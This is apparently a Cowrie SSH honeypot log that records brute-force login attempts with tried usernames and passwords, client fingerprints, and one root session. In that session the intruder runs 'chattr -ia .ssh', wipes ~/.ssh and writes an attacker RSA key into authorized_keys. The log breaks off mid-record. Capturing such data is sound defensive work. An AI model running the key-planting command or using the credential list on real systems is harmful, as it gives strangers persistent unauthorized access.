-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:03:12.710930Z","src_ip":"139.59.14.27","session":"e3915c122d5a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39830,"dst_ip":"1.2.3.4","dst_port":22,"session":"964899092dd0","protocol":"ssh","message":"New connection: 212.227.235.229:39830 (1.2.3.4:22) [session: 964899092dd0]","sensor":"my-vps","timestamp":"2025-09-08T13:03:12.842994Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:03:12.845586Z","src_ip":"212.227.235.229","session":"964899092dd0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:03:13.007625Z","src_ip":"212.227.235.229","session":"964899092dd0"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T13:03:13.645705Z","src_ip":"212.227.235.229","session":"964899092dd0"}
{"eventid":"cowrie.login.failed","username":"tempuser","password":"admin","message":"login attempt [tempuser/admin] failed","sensor":"my-vps","timestamp":"2025-09-08T13:03:14.030989Z","src_ip":"139.59.14.27","session":"e3915c122d5a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:03:14.807418Z","src_ip":"212.227.235.229","session":"964899092dd0"}
{"eventid":"cowrie.session.closed","duration":"3.0","message":"Connection lost after 3.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:03:15.350039Z","src_ip":"139.59.14.27","session":"e3915c122d5a"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":56804,"dst_ip":"1.2.3.4","dst_port":22,"session":"46dbd5fd80cb","protocol":"ssh","message":"New connection: 134.199.174.250:56804 (1.2.3.4:22) [session: 46dbd5fd80cb]","sensor":"my-vps","timestamp":"2025-09-08T13:03:23.137813Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:03:23.138845Z","src_ip":"134.199.174.250","session":"46dbd5fd80cb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:03:23.458252Z","src_ip":"134.199.174.250","session":"46dbd5fd80cb"}
{"eventid":"cowrie.login.failed","username":"user","password":"1234567890","message":"login attempt [user/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T13:03:24.352233Z","src_ip":"134.199.174.250","session":"46dbd5fd80cb"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:03:25.651613Z","src_ip":"134.199.174.250","session":"46dbd5fd80cb"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":41596,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb2f6496080c","protocol":"ssh","message":"New connection: 134.199.174.250:41596 (1.2.3.4:22) [session: bb2f6496080c]","sensor":"my-vps","timestamp":"2025-09-08T13:03:58.092021Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:03:58.092767Z","src_ip":"134.199.174.250","session":"bb2f6496080c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:03:58.409883Z","src_ip":"134.199.174.250","session":"bb2f6496080c"}
{"eventid":"cowrie.login.failed","username":"user","password":"password1","message":"login attempt [user/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:03:59.494271Z","src_ip":"134.199.174.250","session":"bb2f6496080c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:00.940160Z","src_ip":"134.199.174.250","session":"bb2f6496080c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44214,"dst_ip":"1.2.3.4","dst_port":22,"session":"867ddfe002ac","protocol":"ssh","message":"New connection: 212.227.235.229:44214 (1.2.3.4:22) [session: 867ddfe002ac]","sensor":"my-vps","timestamp":"2025-09-08T13:04:02.636114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:04:02.636940Z","src_ip":"212.227.235.229","session":"867ddfe002ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:04:02.767234Z","src_ip":"212.227.235.229","session":"867ddfe002ac"}
{"eventid":"cowrie.login.failed","username":"testnet","password":"123456789","message":"login attempt [testnet/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T13:04:03.330653Z","src_ip":"212.227.235.229","session":"867ddfe002ac"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:04.462391Z","src_ip":"212.227.235.229","session":"867ddfe002ac"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46590,"dst_ip":"1.2.3.4","dst_port":22,"session":"144a91940a77","protocol":"ssh","message":"New connection: 212.227.235.229:46590 (1.2.3.4:22) [session: 144a91940a77]","sensor":"my-vps","timestamp":"2025-09-08T13:04:21.740796Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:04:21.741993Z","src_ip":"212.227.235.229","session":"144a91940a77"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:04:22.010198Z","src_ip":"212.227.235.229","session":"144a91940a77"}
{"eventid":"cowrie.login.failed","username":"enable","password":"enable@2025","message":"login attempt [enable/enable@2025] failed","sensor":"my-vps","timestamp":"2025-09-08T13:04:23.124851Z","src_ip":"212.227.235.229","session":"144a91940a77"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39938,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e78263711c2","protocol":"ssh","message":"New connection: 212.227.235.229:39938 (1.2.3.4:22) [session: 1e78263711c2]","sensor":"my-vps","timestamp":"2025-09-08T13:04:23.250132Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:04:23.250925Z","src_ip":"212.227.235.229","session":"1e78263711c2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:04:23.414935Z","src_ip":"212.227.235.229","session":"1e78263711c2"}
{"eventid":"cowrie.login.failed","username":"odoo","password":"password","message":"login attempt [odoo/password] failed","sensor":"my-vps","timestamp":"2025-09-08T13:04:24.114354Z","src_ip":"212.227.235.229","session":"1e78263711c2"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:24.395177Z","src_ip":"212.227.235.229","session":"144a91940a77"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:25.280964Z","src_ip":"212.227.235.229","session":"1e78263711c2"}
{"eventid":"cowrie.session.connect","src_ip":"203.106.164.74","src_port":49968,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bb556c8dcf4","protocol":"ssh","message":"New connection: 203.106.164.74:49968 (1.2.3.4:22) [session: 0bb556c8dcf4]","sensor":"my-vps","timestamp":"2025-09-08T13:04:30.223085Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:04:30.224495Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:04:30.428279Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.login.success","username":"root","password":"oldpassword1","message":"login attempt [root/oldpassword1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:04:31.279985Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:04:31.734884Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:04:31.735934Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:04:31.736873Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:31.940584Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":58746,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e005bf03638","protocol":"ssh","message":"New connection: 134.199.174.250:58746 (1.2.3.4:22) [session: 5e005bf03638]","sensor":"my-vps","timestamp":"2025-09-08T13:04:32.063711Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:04:32.064809Z","src_ip":"134.199.174.250","session":"5e005bf03638"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:04:32.403502Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:04:32.404190Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:04:32.406638Z","src_ip":"134.199.174.250","session":"5e005bf03638"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:04:32.609094Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:04:32.609958Z","src_ip":"203.106.164.74","session":"0bb556c8dcf4"}
{"eventid":"cowrie.session.connect","src_ip":"203.106.164.74","src_port":49994,"dst_ip":"1.2.3.4","dst_port":22,"session":"1b76b462fb28","protocol":"ssh","message":"New connection: 203.106.164.74:49994 (1.2.3.4:22) [session: 1b76b462fb28]","sensor":"my-vps","timestamp":"2025-09-08T13:04:32.806434Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:04:32.807304Z","src_ip":"203.106.164.74","session":"1b76b462fb28"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@opens